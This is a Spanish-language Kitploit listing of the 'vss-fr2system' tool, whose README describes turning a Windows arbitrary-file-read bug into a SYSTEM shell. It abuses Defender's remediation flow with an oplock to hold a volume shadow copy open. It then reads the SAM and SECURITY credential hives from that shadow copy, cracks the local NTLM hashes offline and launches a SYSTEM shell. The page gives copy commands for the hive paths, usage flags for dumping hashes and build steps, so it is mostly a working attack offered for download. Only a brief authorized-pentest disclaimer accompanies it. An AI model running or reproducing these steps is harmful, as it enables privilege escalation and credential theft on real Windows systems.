Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
vss-fr2system — prueba | Kitploit
Herramientas/GitHubGitHub/sailay1996/vss-fr2system
Descifrado de ContraseñasEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHubsailay1996/vss-fr2system

vss-fr2system

prueba

Ver Repositorio
10819hace 3 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

vss-fr2system

Dos pequeñas herramientas que convierten un fallo de lectura arbitraria de archivos en Windows en un shell SYSTEM.

  • vss_freeze/ — crea una copia de sombra de volumen como usuario estándar, luego la mantiene abierta para que tengas tiempo de leer los archivos SAM/SECURITY/SYSTEM de ella
  • fr2system/ — toma los archivos que copiaste, descifra los hashes NTLM locales sin conexión y lanza un shell SYSTEM

Junto con cualquier primitiva de lectura arbitraria de archivos que se ejecute como SYSTEM (o cualquier cosa que pueda leer de \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...), esto forma una cadena completa de usuario estándar → SYSTEM en un equipo con Win10/Win11 por defecto.


Antecedentes

Esto se extrajo de BlueHammer — la investigación sobre abuso de Win Defender donde descubrimos que soltar un archivo EICAR en una ruta vigilada hace que Defender cree una copia de sombra de volumen como parte de su flujo de corrección. Mantuvimos un oplock por lotes de RstrtMgr.dll en la ruta de carga de Defender para que Defender se detenga al inicio de la corrección, lo que a su vez mantiene VSS vivo el tiempo necesario.

Originalmente había una segunda etapa con un bloqueo cldflt encima, pero cldflt rechaza proveedores de sincronización que no sean OneDrive en Win11 24H2 (CfRegisterSyncRoot devuelve 0x80070057). Mantener abierto el oplock de la primera etapa resultó suficiente: Defender se queda en pausa, VSS se mantiene vivo, sin necesidad de la API de Cloud Files.


La cadena

LPE real (ya tienes una lectura arbitraria de archivos)

root@kitploit:~
[ vss_simple_freeze.exe ]   →   [ tu PoC de lectura arb. ]   →   [ fr2system.exe ]
   crea VSS como usuario         lee SAM/SECURITY              descifra NTLM, lanza
   estándar, lo mantiene         desde la ruta VSS             shell SYSTEM
   mediante oplock
  1. Ejecuta vss_simple_freeze.exe --hold 120 como usuario normal. Muestra la ruta VSS, p.ej. \Device\HarddiskVolumeShadowCopy7.
  2. Ejecuta tu fallo de lectura arb. de archivos para leer estos desde el VSS:
    • \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\Config\SAM
    • \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\Config\SECURITY
    • Guárdalos como C:\Windows\Temp\fileread\SAM y C:\Windows\Temp\fileread\SECURITY.
  3. Ejecuta fr2system.exe. Shell SYSTEM.

Prueba sin un fallo de lectura arb.

Si solo quieres verificar que la cadena funciona de principio a fin en tu equipo, simula el paso de lectura arb. con un cmd de administrador:

root@kitploit:~
:: Ventana 1 - usuario estándar
vss_simple_freeze.exe --hold 300

:: Ventana 2 - cmd de administrador (simulando la primitiva de lectura arb.)
mkdir C:\Windows\Temp\fileread
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\Config\SAM"      C:\Windows\Temp\fileread\SAM
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\Config\SECURITY" C:\Windows\Temp\fileread\SECURITY

:: Ventana 3 - usuario estándar de nuevo
fr2system.exe

(Reemplaza 7 con el número que haya mostrado vss_simple_freeze.)


Uso

vss_simple_freeze

root@kitploit:~
vss_simple_freeze.exe [opciones]

  --hold N            Liberación automática tras N segundos (por defecto: esperar Enter)
  --auto              No interactivo, mantener hasta 600 s
  --publish FILE      Escribir la ruta VSS en FILE (por defecto: %TEMP%\vss_current.txt)
  --no-publish        No escribir la ruta VSS en ningún sitio
  --event NAME        Liberar cuando el evento con nombre Local\NAME sea señalado
  --quiet             Suprimir salida de actividad por segundo
  --help              Mostrar ayuda

Ejemplos:
  vss_simple_freeze.exe                              # interactivo, Enter para liberar
  vss_simple_freeze.exe --hold 120                   # liberación automática tras 2 min
  vss_simple_freeze.exe --event lpe_done --hold 300  # liberar al señalizar o tras 5 min

fr2system

root@kitploit:~
fr2system.exe [opciones]

  (ninguna)           Por defecto - leer SAM/SECURITY de C:\Windows\Temp\fileread, escalar a SYSTEM
  --dump              Solo volcar hashes NTLM, sin escalar
  --scan              Buscar fuentes alternativas de credenciales
  --path DIR          Usar un directorio de entrada diferente
  --help              Mostrar ayuda

Ejemplos:
  fr2system.exe
  fr2system.exe --dump
  fr2system.exe --path C:\lab\hives

fr2system.exe espera al menos SAM en el directorio de entrada. SECURITY es opcional (se usa para secretos LSA / claves DPAPI).


Compilación

Ambos proyectos usan MSVC (CRT estático, x64).

root@kitploit:~
cd vss_freeze
build_vss_simple_freeze.bat

cd fr2system
msbuild fr2system.sln /p:Configuration=Release /p:Platform=x64

Capturas de pantalla

Creación de VSS:

vss_simple_freeze run

fr2system → shell SYSTEM:

fr2system run


Notas

  • Probado en Win10 22H2 y Win11 23H2/24H2 con Defender habilitado.
  • La técnica VSS depende del flujo de corrección de Defender. Si Defender está deshabilitado o reemplazado por otro antivirus, el oplock de la primera etapa no se disparará y no se creará VSS; en ese caso elige una primitiva VSS diferente.
  • Esto es herramienta de investigación / pentest autorizado. No la ejecutes en sistemas para los que no tengas permiso.
Descargar herramienta